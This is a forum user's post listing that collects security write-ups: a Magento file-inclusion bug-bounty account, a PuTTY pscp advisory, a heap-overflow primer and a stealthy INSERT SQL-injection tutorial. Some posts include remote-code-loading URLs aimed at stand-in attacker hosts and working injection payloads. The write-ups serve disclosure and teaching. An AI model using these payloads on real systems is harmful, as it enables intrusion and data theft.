-
Posts
18752 -
Joined
-
Last visited
-
Days Won
724
Everything posted by Nytro
-
Attacking The XNU Kernel In El Capitain
-
Hacking Magento eCommerce For Fun And 17.000 USD Magento, which was acquired by Ebay Inc back in 2011, is one of the most popular e-commerce platforms written in PHP. There is an interesting bug bounty program in place that offers bounties of up to 10,000$ for Information Disclosure and Remote Code Execution vulnerabilities. In November 2014, I decided to give it a try, so I started looking for security bugs in Magento CE, and almost immediately I discovered a PHP Object Injection vulnerability which (un)fortunately requires administrator privileges in order to be exploited. I thought this reason was good enough to choose not to report my finding under their bug bounty program, since Magento administrators should already be able to upload and execute arbitrary code through the administration panel. However, after a couple of weeks a friend of mine encouraged me to submit the finding, because you never know. So I did it, and when I finished writing my report including a PoC, and I was about to send it, I noticed that the bug had already been (silently!) patched only a few days earlier! The researcher who reported the vulnerability has been awarded with 2,500$ for the very same finding… A couple of months later, in February 2015, there was a lot of rumors about what I consider a very nice piece of research which chains several vulnerabilities in Magento that ultimately allow an unauthenticated attacker to execute arbitrary PHP code on the web server. Getting inspired by these vulnerabilities, I decided to come back to Magento source code looking for new security bugs, and I discovered and reported two vulnerabilities which made me win two bounties I’d never thought I’d receive: 8,000$ and9,000$. Both of the vulnerabilities were discovered in February 2015, however I decided to report only a “potential Remote Code Execution” at a first stage, because I thought the other one – a trivial information leakage bug – had a security impact too low in order to be eligible for the bug bounty program, in other words I thought it wasn’t a “real” security issue. I was wrong (again!)… • Autoloaded File Inclusion in SOAP API (CVE-2015-6497) There is a class of vulnerabilities that might affect certain PHP applications which uses an “exploitable” autoloading mechanism. The “Autoloading Classes” feature has been introduced in PHP 5.0 with the magic function __autoload() which is automatically called when your code references a class or interface that hasn’t been loaded yet. So, instead of including every needed class by hand, it is possible to register a function that gets called as soon as the code tries to instantiate an unknown class. This function gets passed the unknown class name and is responsible for including the right file that contains the class definition. While this feature is extremely useful and powerful, it might introduce potential Local/Remote File Inclusion vulnerabilities when user-controlled input is used as a class name. Indeed, if an attacker can control the class name variable passed to an autoloading function, she could try to play around with it in order to include an arbitrary file and execute PHP code remotely. There are multiple ways to trigger the autoloader, the most obvious is class instantiation using the new operator. In addition to that, there are some PHP functions which can be considered a sensitive sink for this class of vulnerabilities. Here is an incomplete list: class_exists() interface_exists() method_exists() property_exists() is_subclass_of() … So, when user-controlled input (tainted data) enters one of these sensitive sinks there’s a chance for the application to be vulnerable to an “Autoloaded File Inclusion” attack. Let’s see a simple example of vulnerable code: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 /* Some code... */ function __autoload($class_name) { include $class_name . '.php'; } if(isset($_GET['class']) && class_exists($_GET['class'])) { $myObject = new $_GET['class']; } else { die('No class found'); } /* Some code... */ In this example an attacker controls a class name via the GET parameter “class”, which is first used with the class_exists()function (triggering the autoloader in case it is an unknown class) and then to instantiate a new object. This means that the attacker can control the $class_name variable passed to the autoloader, therefore it could be possible to include arbitrary files from both local or remote resources by invoking URLs like these: http://example.com/vuln.php?class=http://attacker.com/shell http://example.com/vuln.php?class=../../../tmp/cache/attacker_controlled/file In the first case the autoloader will try to include and execute the PHP code located at http://attacker.com/shell.php, resulting in a Remote File Inclusion (RFI); while in the second case the autoloader will try to include and execute the PHP code located into the file /tmp/cache/attacker_controlled/file.php, resulting in a Local File Inclusion (LFI). Furthermore, in cases like this where the attacker controls the classname’s prefix, in addition to http:// other PHP wrappers might be abused in order to execute arbitrary PHP code. According to the official PHP documentation “a valid class name starts with a letter or underscore, followed by any number of letters, numbers, or underscores”. That means an attacker cannot include arbitrary files via class names because it should not be possible to e.g. use path traversal sequences (../../) through them. But here comes the problem: there was a bug in the PHP core which allowed to invoke class autoloaders with invalid class names. This bug was solved in January 2014 with the release of PHP versions 5.4.24 and 5.5.8, and that’s probably one of the reasons why Magento’s security engineers have undervalued this issue. Magento Vulnerability The vulnerability in Magento is caused by the code that handles the “catalogProductCreate” SOAP API call. The vulnerable code is located into the /app/code/core/Mage/Catalog/Model/Product/Api/V2.php script: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 public function create($type, $set, $sku, $productData, $store = null) { if (!$type || !$set || !$sku) { $this->_fault('data_invalid'); } $this->_checkProductTypeExists($type); $this->_checkProductAttributeSet($set); /** @var $product Mage_Catalog_Model_Product */ $product = Mage::getModel('catalog/product'); $product->setStoreId($this->_getStoreId($store)) ->setAttributeSetId($set) ->setTypeId($type) ->setSku($sku); if (!property_exists($productData, 'stock_data')) { //Set default stock_data if not exist in product data $_stockData = array('use_config_manage_stock' => 0); $product->setStockData($_stockData); } This method expects the $productData parameter to be an array (in form of a stdClass object) and uses the property_exists()function with it. However, an attacker can manipulate a SOAP request arbitrarily and send the $productData parameter in form of a string. In this case, if the string passed to the property_exists() function is an unknown class, any registered autoloader function will be triggered. When the property_exists() function is called there’s only one autoloader function registered, that is theVarien_Autoload::autoload() method: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 public function autoload($class) { if ($this->_collectClasses) { $this->_arrLoadedClasses[self::$_scope][] = $class; } if ($this->_isIncludePathDefined) { $classFile = COMPILER_INCLUDE_PATH . DIRECTORY_SEPARATOR . $class; } else { $classFile = str_replace(' ', DIRECTORY_SEPARATOR, ucwords(str_replace('_', ' ', $class))); } $classFile.= '.php'; //echo $classFile;die(); return include $classFile; } In such a scenario, the $class parameter automatically passed to this method is exactly the same string value sent through the$productData parameter from the SOAP request, which after some replacementes and a “.php” string appended to it, is being used in a call to the include() function. This may result in an arbitrary file inclusion (both from local or remote resources) and could be exploited to include and execute arbitrary PHP code. There are some conditions which should be met to exploit this vulnerability: an API user account with privileges to create a catalog product is required; in order to include arbitrary files from remote locations, Magento should run on PHP before 5.4.24 or 5.5.8, because such versions have fixed the issue related to invalid class names in the autoloading process; in order to include arbitrary files from remote locations the “allow_url_include” directive must be set to On; in case the “allow_url_include” directive is set to Off it might still be possible to include files from remote locations using thessh2.sftp:// wrapper (which requires the SSH2 extension to be installed) or execute arbitrary OS commands leveraging theexpect:// wrapper (which requires the Expect extension to be installed). NOTE: if Magento is running on PHP version after 5.4.23 or 5.5.7 the vulnerability could still be exploited by including a local file with a .php extension (something like /tmp/test.php). If Magento is running on PHP before 5.3.4 the vulnerability could be exploited to include arbitrary local files with any extension (e.g. a session file containing malicious PHP code injected by the attacker) because NULL bytes are allowed within the path (see CVE-2006-7243). Proof of Concept A remote attacker with valid API credentials could send a SOAP request like the following in order to exploit the vulnerability: POST /magento/index.php/api/v2_soap HTTP/1.0 Host: localhost Content-Length: 804 Connection: close <?xml version=”1.0″ encoding=”UTF-8″?> <SOAP-ENV:Envelope xmlns:SOAP-ENV=”http://schemas.xmlsoap.org/soap/envelope/” xmlns:ns1=”urn:Magento” xmlns:xsd=”http://www.w3.org/2001/XMLSchema” xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance” xmlns:SOAP-ENC=”http://schemas.xmlsoap.org/soap/encoding/” SOAP-ENV:encodingStyle=”http://schemas.xmlsoap.org/soap/encoding/”> <SOAP-ENV:Body> <ns1:catalogProductCreate> <sessionId xsi:type=”xsd:string”>VALID_SESSION</sessionId> <type xsi:type=”xsd:string”>simple</type> <set xsi:type=”xsd:string”>4</set> <sku xsi:type=”xsd:string”>test</sku> <productData xsi:type=”xsd:base64Binary”>ZnRwOi8vYXR0YWNrZXI6cGFzc3dvcmRAYXR0YWNrZXJfc2VydmVyLmNvbS9ob21lL2F0dGFja2VyL2V2aWw=</productData> <storeView xsi:nil=”true”/> </ns1:catalogProductCreate> </SOAP-ENV:Body> </SOAP-ENV:Envelope> The “productData” parameter has been encoded in base64 within the SOAP request, and the decoded string is the following: ftp://attacker:password@attacker_server.com/home/attacker/evil This means that leveraging the ftp:// wrapper, an attacker might be able to force Magento to load and execute malicious code from a FTP server under its control. In this example, the attacker only has to put the malicious code under /home/attacker/evil.php. However, as we said before, other PHP wrappers might be abused, potentially leading to direct arbitrary PHP code execution. Responsible Disclosure Timeline As I was saying, I reported this vulnerability in late February 2015, and I received the first reply from the Magento Security Team on June 22, 2015, stating that my submission was not eligible for the bug bounty program, because it was found to be invalid and not actionable. The reason for the rejection was that there are too many requirements to exploit the vulnerability. First of all, it requires Magento to be running on outdated PHP versions, because this kind of vulnerability has been fixed in the PHP core engine at the beginning of 2014. However, until today there are still many websites out there using such outdated PHP versions. That should be one of the reasons why the Magento Security Team replied on June 24, stating the following: We were able to confirm your issue. Even though it requires knowing API credentials, it should not be possible to execute such actions. The PHP versions that are additionally vulnerable, while old are still used in popular distributions like RHEL 7.1. We will schedule fixing this issue for our next product release given lower priority. We will inform you regarding possible awards associated with this report. On August 4, 2015, a bundle of patches (SUPEE-6482), which resolved several security-related issues, including the one I reported in February, was released by the Magento team. On the same day Magento released new versions (Community Edition 1.9.2.1 and Enterprise Edition 1.14.2.1) that include SUPEE-6482 along with other security patches. On August 13 I sent them an email asking whether there was any chance to get a bounty for reporting such a vulnerability. I had to ping them twice more, before getting their reply on August 25: Hello Egidio, Congratulations! Your vulnerability report and proof of concept have been accepted and you will be receiving a bounty of USD $8,000. I published KIS-2015-04 on September 11, 2015 and I received my bug bounty on September 21, 2015. • Information Disclosure in RSS Feed (CVE-2016-2212) After a while, in late October 2015, I remembered about that information leakage bug I discovered back in February, and I wondered “Why don’t try to report this as well? Maybe I’m missing something out and I wrongly believe this isn’t a real security issue”. Actually I was missing something crucial, the fact that leveraging this vulnerability a remote unauthenticated attacker might be able to download order comments and other order-related information, potentially including Personally Identifiable Information or credit card data… What a bad “AppSec Guy” I am!! I reported this vulnerability on October 29, 2015, including a Proof of Concept code, and a proposed patch for the vulnerability, which is exactly the same they used to fix the issue. I received a reply from the Magento Security Team on the very same day: Hello Egidio, Thank you for your submission. We have logged ticket APPSEC-1171 to track this issue. We will reach out to you once our security engineers have validated this issue. Per the Magento Responsible Disclosure Guidelines, we ask that you do not disclose your finding to the public or to the media while we validate your submission with our security engineers. After some months of silence, it was a wonderful Sunday afternoon when I noticed that some days earlier, specifically on January 20, 2016, the Magento team released SUPEE-7405 and new Magento versions which include fixes for several security-related issues, including “Information Disclosure in RSS feed – APPSEC-1171″. Consequently, I sent them another email asking whether there was any chance to get a bounty for reporting such a vulnerability (again!). I got their reply on February 1, 2016: Hello Egidio, Congratulations! Your vulnerability report and proof of concept have been accepted and you will be receiving a bounty of USD $9,000. I received my bug bounty on February 12, 2016 and I published KIS-2016-02 on February 23, 2016. Actually there is a weird coincidence, because that very same day, only a few hours before publishing the advisory on my website, they pushed an update:SUPEE-7405 v1.1 patch bundle. It could be just a coincidence, however I found this very curious… don’t you? Conclusion Seeing my personal experience with the Magento bug bounty program (and even experiences from other security researchers), it looks like they truly believe in a “security through obscurity” methodology. I’m quite disappointed by the fact they tried to downplay the severity of my vulnerabilities, silently patching them after several months, without letting me know their progresses. However, what really disappoints me is that my vulnerabilities seem to be quite critical, specially considering they’re the only two classes of security bugs they’re willing to pay up to 10,000$ under their bug bounty program. I had to ping them several times in order to get my bounties, so I believe they tried to “obscure” and underevaluate my findings not only because of their “security through obscurity” methodology, but probably because they were also hoping I’d never noticed their advisories with my name and the vulnerabilities I reported, and never claimed my bounties for such findings? This entry was posted on March 3, 2016 Sursa: http://karmainsecurity.com/hacking-magento-ecommerce-for-fun-and-17000-usd
-
- 2
-
-
VuNote Author: tintinweb@oststrom.com <github.com/tintinweb> Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-2563 Version: 0.1 Date: Feb 20th, 2016 Tag: putty pscp client-side post-auth stack buffer overwrite when processing remote file size Overview Name: putty Vendor: sgtatham References: * http://www.chiark.greenend.org.uk/~sgtatham/putty/ [1] Version: 0.66 [2] Latest Version: 0.66 Other Versions: 0.59 [3] (~9 years ago) <= affected <= 0.66 Platform(s): win/nix Technology: c Vuln Classes: stack buffer overwrite (CWE-121) Origin: remote Min. Privs.: post auth CVE: CVE-2016-2563 Description quote website [1] PuTTY is a free implementation of SSH and Telnet for Windows and Unix platforms, along with an xterm terminal emulator. It is written and maintained primarily by Simon Tatham. Summary The putty SCP command-line utility (pscp) is missing a bounds-check for a stack buffer when processing the SCP-SINK file-size response to a SCP download request. This may allow a malicious server to overwrite the stack buffer within the client- application potentially leading to remote code execution. PoC attached. patch attached. Besides that, two minor issues have been reported in putty packet handling: DoS condition in the parsing of SSH-Strings that lead to a nullptr read. (connect putty to poc and type 'x11exploit' to trigger one occurrence of a crash) DoS condition in the handling of unrequested forwarded-tcpip channels open requests that lead to a nullptr read. (connect putty to poc and type 'forwardedtcpipcrash' to trigger crash) Link: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-2563
-
Ransomware Tracker https://ransomwaretracker.abuse.ch/
-
- 2
-
-
-
ODAT ODAT (Oracle Database Attacking Tool) is an open source penetration testing tool that tests the security of Oracle Databases remotely. Usage examples of ODAT: You have an Oracle database listening remotely and want to find valid SIDs and credentials in order to connect to the database You have a valid Oracle account on a database and want to escalate your privileges to become DBA or SYSDBA You have a Oracle account and you want to execute system commands (e.g. reverse shell) in order to move forward on the operating system hosting the database Tested on Oracle Database 10g, 11g and 12c(12.1.0.2.0). Link: https://github.com/quentinhardy/odat
-
Understanding the Heap & Exploiting Heap Overflows This post will begin with a high level description of the heap and slowly builds up untill you able to write your own heap-based exploits. We assume we have non-root access to a computer but are able to run the following program as root (meaning it's a suid binary): #include <string.h> #include <stdlib.h> #include <stdio.h> int main(int argc, char *argv[]) { char *buf1 = malloc(128); char *buf2 = malloc(256); read(fileno(stdin), buf1, 200); free(buf2); free(buf1); } view rawheapsploit1.c hosted with ❤ by GitHub There's a blatant buffer overflow in line 10 which we will be exploiting. First we need to know how the heap is managed (we focus on Linux). Basic Heap and Chunk Layout Every memory allocation a program makes (say by calling malloc) is internally represented by a so called "chunk". A chunk consists of metadata and the memory returned to the program (i.e., the memory actually returned by malloc). All these chunks are saved on the heap, which is a memory region capable of expanding when new memory is requested. Similarly, the heap can shrink once a certain amount of memory has been freed. A chunk is defined in the glibc source as follows: struct malloc_chunk { INTERNAL_SIZE_T prev_size; /* Size of previous chunk (if free). */ INTERNAL_SIZE_T size; /* Size in bytes, including overhead. */ struct malloc_chunk* fd; /* double links -- used only if free. */ struct malloc_chunk* bk; /* Only used for large blocks: pointer to next larger size. */ struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */ struct malloc_chunk* bk_nextsize; }; view rawmalloc\malloc.c hosted with ❤ by GitHub Assuming no memory chunks have been freed yet, new memory allocations are always stored right after the last allocated chunk. So if a program were to call malloc(256), malloc(512), and finally malloc(1024), the memory layout of the heap is as follows: Meta-data of chunk created by malloc(256) The 256 bytes of memory return by malloc ----------------------------------------- Meta-data of chunk created by malloc(512) The 512 bytes of memory return by malloc ----------------------------------------- Meta-data of chunk created by malloc(1024) The 1024 bytes of memory return by malloc ----------------------------------------- Meta-data of the top chunk The dash line "---" is an imaginary boundary between the chunks, in reality they are placed right next to each other (example program illustrating the layout). Anyway, you're probably wondering why I included the meta data of the "top chunk" in the layout. Well, the top chunk represents the remaining available memory on the heap, and it is the only chunk that can grow in size. When a new memory request is made, the top chunk is split into two: the first part becomes the requested chunk, and the second part is the new the top chunk (so the "top chunk" shrunk in size). If the top chunk is not large enough to fulfill the memory allocation, the program asks the operating system to expand the top chunk (making the heap grow in size). Articol complet: http://www.mathyvanhoef.com/2013/02/understanding-heap-exploiting-heap.html
-
- 1
-
-
Windows Filtering Platform: Persistent state under the hood ri 04 March 2016 By Damien Aumaitre Alexandre Gazet Since Windows XP SP2, the Windows firewall is deployed and enabled by default in every Microsoft Windows operating system. The firewall relies on a set of API and services called the Windows Filtering Platform (WFP). Although used by almost every Windows OS, WFP is still one of the relatively unknown beast that lies in the kernel. In this post we will see how the firewall manages its persistent state. Disclaimer: this post was written a year ago with Alexandre Gazet, a former colleague. After gathering dust for too long we decided to publish it anyway. All experiments were conducted on a Microsoft Windows 8.1 operating system. Introduction The registry is full of unknown binary blobs. Not so long ago, we stumbled upon the registry sub-key of the BFE service. On this picture we see a bunch of entries with a name that looks like a GUID and some binary data. So what is this BFE thingy? A quick search on Google points us on the right direction: BFE stands for Base Filtering Engine which is a core part of the Windows Filtering Platform (WFP). Since Windows XP SP2, the Windows firewall is deployed and enabled by default in every Microsoft Windows operating system. The firewall relies on a set of API and services called the Windows Filtering Platform (WFP). Although used by almost every Windows OS, WFP is still one of the relatively unknown beast that lies in the kernel. The WFP architecture is well explained on the MSDN (http://msdn.microsoft.com/en-us/library/windows/desktop/aa366509(v=vs.85).aspx) Amongst the points of high interest we can mention two components: the user-mode Base Filtering Engine (BFE locating in bfe.dll) and its kernel-mode counterpart KM Filter Engine (KMFE located in netio.sys). WFP can be used by third parties to develop advanced filtering or routing solution (implementing a VPN solution comes to mind). However, this is also the core of the well known Windows firewall which comes by default with a set of pre-configured rules: For now let's just say that a filter is a rule that governs classification. It defines a set of conditions, when met, triggers an action (ie: a callout). A filter operates at a certain level: e.g.: FWPM_LAYER_OUTBOUND_TRANSPORT_V4_DISCARD. Rules are grouped into providers that define "logical features" (for example: Microsoft Windows WFP Built-in TCP Templates provider or Windows Firewall IPsec Provider). Our objective is to discover how the OS interacts with the WFP and how the configuration is persistently stored in the binary format. With this premise in mind, we'll start to examine the WFP objects' lifetime. A quick look on the documentation tells us that WFP objects can have one of four possible lifetimes: Dynamic: An object is dynamic only if it is added using a dynamic session handle. Dynamic objects live until they are deleted or the owning session terminates. Static: Objects are static by default. Static objects live until they are deleted, BFE stops, or the system is shutdown. Persistent: Persistent objects are created by passing the appropriate FWPM_*_FLAG_PERSISTENT flag to an Fwpm*Add0 function. Persistent objects live until they are deleted. Built-in: Built-in objects are predefined by BFE and cannot be added or deleted. They live forever. Kernel-mode Filters can be marked as boot-time filters by passing the appropriate flag to FwpmFilterAdd0 function. Boot-time filters are added to the system when the TCP/IP driver starts, and removed when BFE finishes initialization. So how are these persistent objects managed? It's time to do a bit of reversing. Articol complet: http://blog.quarkslab.com/windows-filtering-platform-persistent-state-under-the-hood.html
-
Exploiting 'INSERT INTO' SQL Injections Ninja Style In the deep hours of the night you stumble upon a form where you are asked for, among other things, your nickname. You enter a single quote ' as your name and you get an error message saying: "You have an error in your SQL syntax". With high probability the SQL injection is taking place in an INSERT statement. Now, you could simply start sqlmap and let it try to do the dirty work. But there's a disadvantage: An automated tool will probably send some request where the INSERT statement succeeds. This will create strange entries in the database. We must avoid this to remain stealthy. Let's create a similar situation locally and demonstrate this. Our test code is: <?php $con = mysql_connect("localhost", "root", "toor") or die(mysql_error($con)); mysql_select_db("testdb", $con) or die(mysql_error($con)); $var = $_POST['post']; mysql_query("INSERT INTO data VALUES ('one', '$var')") or die(mysql_error($con)); mysql_close($con) or die(mysql_error($con)); echo "The values have been added!\n"; ?> Normally a good programmer will write better code than that, but it's just an example and will suffice to demonstrate the exploit. We run sqlmap against this using the command ./sqlmap.py -u "http://localhost/test.php" --data "post=ValidValue" -v 3 The (partly redacted) output of the command can be seen on pastebin. It found an error-based SQL injection. We will return to this result at the end of the post. For now we will ignore the error-based SQL injection and only notice that unwanted new database entries have been added by using sqlmap: Avoiding unwanted inserts We must find a query that is syntactically correct yet contains a semantic error. Moreover the semantic error should only be detectable by executing the query. I immediately thought of scalar subqueries. These are subqueries that must return only a single row, otherwise an error is thrown. As quoted from the MySQL manual: In its simplest form, a scalar subquery is a subquery that returns a single value. A scalar subquery is a simple operand, and you can use it almost anywhere a single column value or literal is legal, and you can expect it to have those characteristics that all operands have: a data type, a length, an indication that it can be NULL, and so on. An artificial example is: SELECT (SELECT name FROM users WHERE email = 'bobby@tables.com') If the subquery is empty it's converted to the value NULL. Now, if email is a primary key then at most one name will be returned. If email isn't a primary key it depends on the contents of the database. This proves that we must first execute the subquery and only then will we know if it's really a scalar subquery or not! Another variation where the subquery must be scalar is: SELECT 'Your name is: ' || (SELECT name FROM users WHERE email = 'bobby@tables.com') Here || stands for the string concatenation. The following query will always return the error "#1242 - Subquery returns more than 1 row" (tested with MySql). SELECT (SELECT nameIt FROM ((SELECT 'value1' AS nameIt) UNION (SELECT 'value2' AS nameIt)) TEST) Alright so we have a query that is executed yet returns an error. This prevents the original INSERT INTO command from being executed, yet our own SQL code will be executed. I will now show how to turn this into a usable blind SQL injection. We will create different behavior/results based on a boolean condition. We can follow two strategies to achieve this. The first is to find another semantic error and output a different error based on the boolean condition. The second strategy is to use a timing attack: If the condition is true the query will complete instantly, otherwise it takes a longer time. The timing attack is the easier one to create. Consider the following SQL statement, where we replaced the nameIt column of the previous SQL statement with a more advanced expression: SELECT (SELECT CASE WHEN <condition> THEN SLEEP(3) ELSE 'anyValue' END FROM ((SELECT 'value1' AS nameIt) UNION (SELECT 'value2' AS nameIt)) TEST) If <condition> is true the server will sleep for 3 seconds and then throw an error that the subquery returned more than one result. Otherwise, if <condition> is false, it will instantly throw the error. All that is left to do is to measure the time it takes for the server to answer the query so we know whether the condition was true or not. We can use automated tools that perform the timing attack based on this foundation. Let's return to our example php code. What do we need to set our argument called post to in order to launch the attack? Try figuring it out yourself first. This is something you must learn to do on your own, especially since you are given the source code. Sending the following will do the trick: ' || (SELECT CASE WHEN <condition> THEN SLEEP(3) ELSE 'anyValue' END FROM ((SELECT 'value1' AS nameIt) UNION (SELECT 'value2' AS nameIt)) TEST) || ' This will expand to: INSERT INTO data VALUES ('one', '' || (SELECT CASE WHEN <condition> THEN SLEEP(3) ELSE 'anyValue' END FROM ((SELECT 'value1' AS nameIt) UNION (SELECT 'value2' AS nameIt)) TEST) || '') Which is valid SQL syntax! Speeding up the attack This is all good and well, but because it's a time based attack it can take an extremely long time to execute. We focus on the other strategy where we trigger different errors based on the boolean condition. First we need to find another error that we can trigger based on a boolean condition. Sound fairly straightforward, but it turns out generating an error is easy, yet finding errors that are generated whilst executing the query and controllable by a boolean condition can be quite hard. After more than an hour of messing around with some SQL statements and reading the MySQL documentation I finally found something usable! I got the following SQL statement: SELECT 'canBeAnyValue' REGEXP (SELECT CASE WHEN <condition> THEN '.*' ELSE '*' END) Here the construct 'value' REGEXP 'regexp' is a boolean condition that is true when value matches the regular expression regexp and is false otherwise. Note that '.*' is a valid regular expression and '*' is not. So when <condition> is true the regular expression will simply be evaluated. When it's false an invalid regular expression is detected and MySql will return the error "#1139 - Got error 'repetition-operator operand invalid' from regexp". Excellent! We can now create a boolean based blind SQL injection where the subquery error is returned if the condition is true, and the regular expression error is returned when the condition is false. But there's a snag: One must be careful with the REGEXP error. Say you modify the time based SQL attack statement to the following: SELECT (SELECT CASE WHEN <condition> THEN 'anyValue' REGEXP '*' ELSE 'AnyValue' END FROM ((SELECT 'value1' AS nameIt) UNION (SELECT 'value2' AS nameIt)) TEST) You reason as follows: If <condition> is false it will return 'thisCanBeAnyValue' twice and then throw an error that the subquery returned more than one result. If <condition> is true it tries to evaluate 'anyValue' REGEXP '*' and throw the regular expression error. But this is not what will happen! With this line you will always end up with the regular expression error. Why? Because MySql knows that 'anyValue' REGEXP '*' is a constant expression and doesn't depend on anything. Therefore it will optimize the query and calculate this value in advance. So even though <condition> is false it still attempts to evaluate the regular expression during the optimization step. This always fails, and hence the regular expression error is always returned. The trick is to put the '*' and '.*' in a separate SELECT CASE WHEN .. END control flow so it won't be optimized. We conclude our story with the following SQL statement against our example code: ' || (SELECT 'thisCanBeAnyValue' REGEXP (SELECT CASE WHEN <condition> THEN '.*' ELSE '*' END) FROM ((SELECT 'value1' AS nameIt) UNION (SELECT 'value2' AS nameIt)) TEST) || ' When the condition is false the regular expression error will be returned, and when the condition is true the subquery error will be returned. All this happens without the actual INSERT statement being successfully executed even once. Hence the website administrator will notice no weird entries in his database. And last but not least, this attack is faster compared to the earlier time based attack. Beautiful! Even better: Error-based SQL injection The previous methods were ideas I found myself. However the website is returning an error message, and there is a known error-based SQL injection technique that can return database entries in the error message. This is the type of attack that sqlmap also returned. With an error-based SQL injection we can greatly speed up the attack. The technique is based on the follow query: SELECT COUNT(*), CONCAT(' We can put any scalar subquery here ', FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x When we execute this command I get the message "ERROR 1062 (23000): Duplicate entry 'We can put any scalar subquery here' for key 'group_key'". As you can see the original input string is returned in the error message! In fact we can put any value we want there, including scalar subsqueries. Let's first investigate why this error is returned. In the MySql documentation we first notice: "You cannot use a column with RAND() values in an ORDER BY clause, because ORDER BY would evaluate the column multiple times". RAND() will also be evaluated multiple times in a GROUP BY clause. Each time RAND() is evaluated it will return a new result. Okay, so according to the documentation we're actually not allowed to use the function RAND() like this. Why? Because the function returns a new value each time it's evaluated yet MySql expects a function to always return this same value. This can cause strange error messages like the one we just got. One possible description of an Advanced Persistant Threat. ... people smarter than me found the "non-blind" error-based attack ... Nevertheless the error message contains a user controllable string! Meaning we can let it return any database entry we want, which greatly speeds up the attack. But perhaps you're still wondering why this particular query fails. Well, answering that question means knowing exactly how the DBMS executes the query. Investigating this is way out of scope for this post. Just remember that in our query the problem is caused because the RAND() function is internally reevaluated and will return a different value, which is something the DBMS is not expecting. Let's put this in our example code again. Something like the following will suffice: ' || (SELECT 'temp' FROM (SELECT COUNT(*), CONCAT(( subquery returning the value we want to retrieve ), FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) FromTable) || ' Et voila, we have a very fast SQL injection. Depending on the tables we can access, this example might need to be modified in order to work properly. In particular we can also include one of the previous SQL injections that always generate an error. This way we will be sure data is never inserted. After all, we are relying on undefined behavior which causes the error to show up. Who knows if there exists another DBMS that handles these queries with RAND() in them differently and they don't produce an error. As a last note, being stealthy is always a relative notion. In some cases SQL errors could be logged and an administrator could be notified when they happen. In such a situation this attack wouldn't be stealthy at all! Follow me on twitter @vanhoefm Addendum: For Oracle 8, 9 and 10g databases the function utl_inaddr.get_host_name can be used to launch an error-based SQL injection. For Oracle 11g ctxsys.drithsx.sn and other functions can be used. [Source1] [Source2] Geplaatst door Mathy op 10:45 Sursa: http://www.mathyvanhoef.com/2011/10/exploiting-insert-into-sql-injections.html
-
Nu am citit, dar pare legat de subiect: https://cryptome.org/2015/06/guccifer-letter-01.htm
-
Putea sa faca ceva mai util, sa "sparga" contul de iCloud al Emmei Watson El e cel care a pornit "The fappening" cu Jennifer Lawrence si restul?
-
Competență sau fraudă? Cristian Șerban Application Security @Betfair PROGRAMARE În urmă cu zece ani la universitatea unde eram student s-a organizat o miniconferință de securitate. Pentru a fi mai interesant, organizatorii au creat și o pagină de înregistrare care urma să fie deschisă pentru a accepta înscrieri începând cu ora 12 la o anumită dată. Mă pasiona domeniul și mi-am dorit să particip. Mi-am dorit să mă înscriu printre primii pentru a-mi asigura locul și mai ales că au promis că dau câte un tricou la primii 20 de participanți care se înscriu. La vremea respectivă eu lucram ca programator angajat full time și deja adunasem ceva ore de lucru în tehnologia folosită pentru dezvoltarea paginii de înscrieri. Așa că nu mi-a luat mult timp să descopăr o vulnerabilitate și să reușesc să o exploatez în timp util. Am reușit să mă înscriu puțin mai înainte de ora oficială. În următoarea zi m-am prezentat la conferință la intrare, am salutat politicos, mi-am spus numele, colegul m-a cautat pe listă și m-a găsit destul de ușor. Am tras puțin cu ochiul: eram primul 11:58. Perfect. Uimit puțin, acesta a zis: "Ah tu ești ăla, cum ai reușit?". La întrebarea mea dacă primesc un tricou, el a răspuns că nu, dar că o să primesc ceva mai bun. În timpul conferinței m-a anunțat public și mi-a înmânat drept premiu cartea "Writing Secure Code" a lui Michael Howard și David LeBlanc. Articol complet: http://www.todaysoftmag.ro/article/1250/competenta-sau-frauda Cred ca e util ca indrumare.
- 1 reply
-
- 4
-
-
Ban.
-
Malware analysis with VM instrumentation, WMI, winexe, Volatility and Metabrik In this article, we will show how to take advantage of Metabrik to automate some malware analysis tasks. The goal will be to execute a malware in a virtual machine (VM), just after you saved a snapshot of Windows operating system. In our example, this snapshot only includes running processes, but you will see you can do more than just that. Here, we introduce remote::wmi, remote::winexeand system::virtualbox Briks. We will also introduce the forensic::volatility Brik which can help you perform dynamic malware analysis and extract IOCs, for instance. Tip: you can use <tab> keystroke to complete Brik names and Commands while using The Metabrik Shell. Setting up the environment wmic and winexe are programs that have to be compiled by yourself. Fortunately,Metabrik makes this process as easy as running the install Command. Since wmicand winexe programs ship with the same software suite, you just have to runinstall Command for one of remote::wmi or remote::winexe Briks. We don’t run the install Command with system::virtualbox Brik, because we suppose you already have some VitualBox VMs installed. use brik::tool use remote::wmi use remote::winexe use forensic::volatility help remote::wmi help remote::winexe help forensic::volatility run brik::tool install_needed_packages remote::wmi run brik::tool install_needed_packages remote::volatility Your VM also has to be configured to allow WMI accesses for a given user, and have the WINEXESVC service started. Some help on how to do that can be found inremote::wmi and remote::winexe Briks source code. Starting a VM and taking a snapshot Our environment is up and running. Let’s start a VM and take a snapshot before we execute a malware within it remotely. For the purpose of this exercise, the malware will simply be calc.exe program. use system::virtualbox help system::virtualbox run system::virtualbox list Let’s start our Windows machine in headless mode: we don’t want to speak with this kind of GUI. set system::virtualbox type headless run system::virtualbox start 602782ec-40c0-42ba-ad63-4e56a8bd5657 run system::virtualbox snapshot_live 602782ec-40c0-42ba-ad63-4e56a8bd5657 "before calc.exe" I know the IP address of the machine, but you could have found it by using ARP scanning on vboxnet0 interface thanks to the network::arp Brik. my $win = '192.168.56.101' my $user = 'Administrator' my $password = 'YOUR_SECRET' set remote::wmi host $win set remote::wmi user $user set remote::wmi password $password set remote::winexe host $win set remote::winexe user $user set remote::winexe password $password run remote::wmi get_win32_process for (@$RUN) { print $_->{Name}."\n"; } You should see no calc.exe right now. Now, launch the calc.exe program and search in the process list if you can find it. Note that you will have to run Ctrl+C keystrokes because the program will block here. But calc.exe should still be running on the remote host. run remote::winexe execute "cmd.exe /c calc.exe" run remote::wmi get_win32_process my 